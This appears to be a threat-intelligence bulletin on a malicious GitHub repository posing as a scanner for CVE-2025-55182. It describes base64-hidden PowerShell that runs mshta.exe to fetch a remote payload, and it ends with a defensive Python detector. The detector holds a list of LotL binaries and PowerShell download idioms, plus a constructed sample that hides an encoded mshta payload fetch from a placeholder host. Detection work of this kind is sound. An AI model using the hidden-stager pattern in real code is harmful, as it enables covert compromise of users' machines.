Current Cyber Threats

GitHub Scanner for React2Shell (CVE-2025-55182) Turns Out to Be Malware

Summary:
A malicious GitHub repository named "React2shell-scanner," hosted by the user "niha0wa," was recently identified as a delivery vehicle for malware rather than a legitimate security tool. Marketed as a scanner for CVE-2025-55182 (React2Shell), the project, uncovered by cybersecurity researcher Saurabh, targeted cybersecurity researchers and professionals investigating the vulnerability in their own organization's environment. Analysis of the script react2shellpy[.]py revealed base64-encoded strings that decoded into PowerShell commands. These commands leveraged mshta.exe to execute a remote payload fetched from the domain py-installer[.]cc. Although GitHub has since removed the repository following reports from the research community, the incident highlights that threat actors will weaponize the trust inherent in the security community, especially around a widely publicized vulnerability, to compromise the workstations of privileged users.

Security Officer Comments:
This campaign underscores a shift in which threat actors increasingly exploit the trust researchers place in tools shared within their own community in order to gain access to high-value environments. By masquerading as a utility for a specific, trending CVE, the attackers have a better chance of bypassing the skepticism such tools would normally face. Threat Intelligence leads should view this as a reminder to employees that the GitHub brand provides no inherent security guarantee. Researchers should watch for the emergence of fake scanning tools for popular exploits and analyze them for obfuscated code before running them. Although the repository has been removed, forks are likely to circulate, and security professionals should remain vigilant for this kind of opportunistic threat.

Suggested Corrections:
  • Mandatory Sandboxing: Never execute third-party scripts or "scanners" from GitHub on a primary workstation. Use isolated virtual machines (VMs) or disposable containers with no access to the internal network.
  • Static Code Analysis: Before execution, manually review source code for "Living off the Land" (LotL) binaries. Specifically, look for calls to mshta.exe, powershell.exe, or certutil.exe used to fetch remote payloads.
  • Author Verification: Prioritize tools from known, reputable security organizations or established researchers. Be skeptical of "new" accounts (like niha0wa) created shortly after a CVE disclosure.
  • Check for Obfuscation: Treat any use of Base64 encoding, hex-encoded strings, or Unicode obfuscation within a scanning script as a high-confidence indicator of malicious intent.
  • Pin by Commit SHA: If integrating third-party actions or utilities into CI/CD pipelines, pin them to a specific commit SHA rather than a mutable tag (e.g., v1.0) to prevent "bait-and-switch" updates.
  • Audit Internal Forks: Ensure that internal teams have not forked the malicious React2shell-scanner repository before its removal, as cached or forked copies may still be active.
  • Immediate Patching: Ensure all production React/Next.js environments are updated to at least v19.2.1 (for React) or the latest hardened releases.
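The static-analysis and obfuscation checks above can be partly automated before a downloaded "scanner" is ever run. The following is an added example, not code from the report or from the malicious repository: it pulls long base64 runs out of a script's text, decodes them as UTF-8 and as UTF-16LE (the encoding PowerShell's -EncodedCommand expects), and flags LotL binaries or PowerShell idioms found either in the decoded text or in cleartext. The sample input is constructed to mirror the reported pattern; the domain in it is a placeholder, not the real one.

```python
import base64
import re

# Long runs of the base64 alphabet; short tokens are usually identifiers.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# LotL binaries and PowerShell idioms that have no place in a vulnerability scanner.
INDICATOR_RE = re.compile(
    r"\b(mshta|powershell|certutil|rundll32|regsvr32|bitsadmin|"
    r"encodedcommand|invoke-expression|downloadstring|frombase64string)\b",
    re.IGNORECASE)

def decode_candidates(blob):
    """Yield printable decodings of a base64 run as UTF-8 and UTF-16LE
    (PowerShell -EncodedCommand takes UTF-16LE)."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            yield text

def scan_source(source):
    """Return decoded-blob findings and cleartext indicator hits for one script."""
    decoded = []
    for m in B64_RE.finditer(source):
        for text in decode_candidates(m.group(0)):
            hits = sorted({h.lower() for h in INDICATOR_RE.findall(text)})
            if hits:  # a base64 run that decodes to a LotL command
                decoded.append((m.group(0)[:24] + "...", text, hits))
    plaintext = sorted({h.lower() for h in INDICATOR_RE.findall(source)})
    return {"decoded": decoded, "plaintext": plaintext}

# Constructed sample in the reported pattern; the domain is a placeholder.
HIDDEN = base64.b64encode(
    "mshta https://example.invalid/payload.hta".encode("utf-16-le")).decode()
BENIGN = base64.b64encode(b"Harmless banner bytes used only for this test.").decode()
CONSTRUCTED_SAMPLE = f'''
import base64, subprocess
BANNER = base64.b64decode("{BENIGN}")
def check(target):
    subprocess.run(["powershell", "-w", "hidden", "-EncodedCommand", "{HIDDEN}"])
'''
```

Run scan_source() over each script in a cloned repository inside the disposable VM; any non-empty "decoded" entry is the signal that a "scanner" is really a stager and should not be executed.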

Link(s):
https://hackread.com/github-scanner-react2shell-cve-2025-55182-malware/